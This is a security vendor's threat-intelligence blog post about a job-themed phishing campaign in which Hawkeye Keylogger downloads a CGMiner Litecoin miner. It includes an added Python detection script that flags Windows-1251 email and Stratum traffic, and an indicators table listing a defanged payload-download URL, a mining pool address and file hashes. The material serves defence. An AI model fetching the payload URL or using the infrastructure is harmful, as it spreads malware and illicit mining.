In a new twist, a phishing campaign is delivering the advanced Hawkeye Keylogger malware to act as a first stage loader for a cryptocurrency miner. Hawkeye Keylogger – Reborn V9 arrived as the attachment of a phishing email themed as a job application. Once executed, Hawkeye downloaded and ran a sample of the open-source software CGMiner. The CGMiner sample was an older version and was configured for the cryptocurrency Litecoin. This is the first instance in which Cofense Intelligence™ has analyzed a keylogger being used merely as a first stage loader to deploy a crypto-miner.

The job application theme used in this phishing campaign was generic and did not target a specific business department or job opening. As seen in Figure 1, the email is short and plain; however, the email source showed a configuration detail that can be used for alerting. The email’s character set was declared as “Windows-1251,” an encoding used to support Cyrillic-script languages. For an organization that does not normally receive business mail in Cyrillic-script languages, this header value can be used as an alerting criterion within the email security stack. The email carried a .zip archive attachment that delivered a sample of Hawkeye Keylogger – Reborn V9.

Figure 1: Compromised email address delivering malicious ZIP attachment under guise of a CV

Hawkeye Keylogger is subscription-based and has been sold on forums since 2013. It has gone through many version updates and has even changed development ownership in the past. This advanced keylogger can be used to monitor systems, gather sensitive information from the machine, and exfiltrate that information to the Command and Control (C2) infrastructure in multiple ways. The developer’s advertisement does not tout it as a first stage downloader. The threat operator behind this campaign used the file installation feature, which is typically used to set persistence on the infected machine, to download and execute the sample of CGMiner. After downloading and executing the secondary payload, Hawkeye Keylogger stopped and did not attempt any further action.

CGMiner is an open-source cryptocurrency miner that can be executed across all operating systems. Older CGMiner versions can be configured to mine multiple types of cryptocurrency and are designed to work with most AMD graphics cards. This sample is CGMiner version 3.5, an older release that still supports CPU/GPU mining. The sample uses the Stratum protocol over TCP port 3333 and is configured to mine Litecoin. Newer versions of CGMiner do not support CPU/GPU mining and only provide algorithms for the Bitcoin cryptocurrency. CGMiner is easily spotted when analyzed in a sandbox environment, and Stratum traffic is similarly distinctive and can serve as a network-level alert.

Cryptocurrency miners have been seen in phishing campaigns before, but rarely as a second stage payload delivered by an advanced keylogger. This version of CGMiner was deliberately selected for its CPU/GPU mining support for Litecoin. The infection chain showed several points at which the email and network security stack should have acted. Setting these alerts, tuning the technology, and educating end users is the best way to avoid these phishing campaigns.
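An added example, not the author's code, that checks the two alerting points named above: a Windows-1251 charset declared in a MIME part, and Stratum JSON-RPC on the wire whatever the destination port. The email, flow records, addresses, pool and worker names are all constructed.

```python
"""Added example: two detection points in the Hawkeye -> CGMiner chain above,
the email's declared charset and Stratum mining traffic (constructed inputs)."""
import email
import json

MINING_PORTS = {3333}  # the port this CGMiner sample used, per the analysis

def email_charsets(raw_message):
    """Return every charset declared by any MIME part, lower-cased and sorted."""
    msg = email.message_from_string(raw_message)
    return sorted({p.get_content_charset() for p in msg.walk()} - {None})

def flag_cyrillic_charset(raw_message):
    """True when a part declares Windows-1251, the header value worth an alert."""
    return "windows-1251" in email_charsets(raw_message)

def classify_flow(dst_port, first_line):
    """Label one TCP flow by destination port and first payload line. Stratum is
    newline-delimited JSON-RPC with 'mining.*' methods, so it is caught on any port."""
    reasons = []
    try:
        rpc = json.loads(first_line)
    except ValueError:
        rpc = None
    if isinstance(rpc, dict) and str(rpc.get("method", "")).startswith("mining."):
        reasons.append("stratum-rpc")
        if "cgminer" in json.dumps(rpc.get("params", [])).lower():
            reasons.append("cgminer-banner")  # client names itself on subscribe
    if dst_port in MINING_PORTS:
        reasons.append("mining-port")
    return reasons

# Constructed sample email (header names real, addresses and content invented).
SAMPLE_EMAIL = (
    "From: applicant@example.invalid\r\nTo: jobs@corp.example\r\n"
    "Subject: CV\r\nMIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
    "--b1\r\nContent-Type: text/plain; charset=Windows-1251\r\n\r\n"
    "Please find my resume attached.\r\n"
    '--b1\r\nContent-Type: application/zip; name="RESUME.zip"\r\n'
    "Content-Transfer-Encoding: base64\r\n\r\nUEsDBA==\r\n--b1--\r\n"
)

# Constructed flow records: (destination port, first payload line).
SAMPLE_FLOWS = [
    (443, "GET / HTTP/1.1"),
    (3333, '{"id": 1, "method": "mining.subscribe", "params": ["cgminer/3.5.0"]}'),
    (8080, '{"id": 2, "method": "mining.authorize", "params": ["worker", "x"]}'),
]
```

The third flow shows why the method check matters: a pool on a non-standard port still produces the "stratum-rpc" label even though the port rule stays silent.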

Table 1: Indicators of Compromise

| Description | Indicator |
|---|---|
| Hawkeye Keylogger Within Attachment | Redacted_RESUME_Sep.exe |
| | a381ba89d294f120dd76a684bda24276 |
| Email Attachment | Redacted_RESUME_Sep.zip |
| | 3866532d537df4795d88f97c38c1c25a |
| CGMiner | functionupdate.exe |
| | 4a7d5d67ce8e6a890f4a272be3f782bd |
| Payload URL | hxxp://165[.]22[.]50[.]215/functionupdate[.]exe |
| Litecoin Mining Connection | stratum+tcp://us[.]litecoinpool[.]org:3333 |

HOW COFENSE CAN HELP

Cofense PhishMe™ offers simulation templates to educate users on phishing tactics similar to those described in today’s blog.

  • Job Application – Office Macro / Hermes Ransomware
  • Job Inquiry – Cerber (Attachment)
  • Response to Job Posting
  • Resume Attached
  • CV Attached – Petya

Cofense Intelligence™: ATR ID 32403

Cofense Triage™: PM_Intel_GCMiner_32403

Every day, the Cofense Phishing Defense Center™ analyzes phishing emails with malware payloads that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe™ and remove the blind spot with Cofense Reporter™.

Quickly turn user reported emails into actionable intelligence with Cofense Triage™. Reduce exposure time by rapidly quarantining threats with Cofense Vision™.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence™.


All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.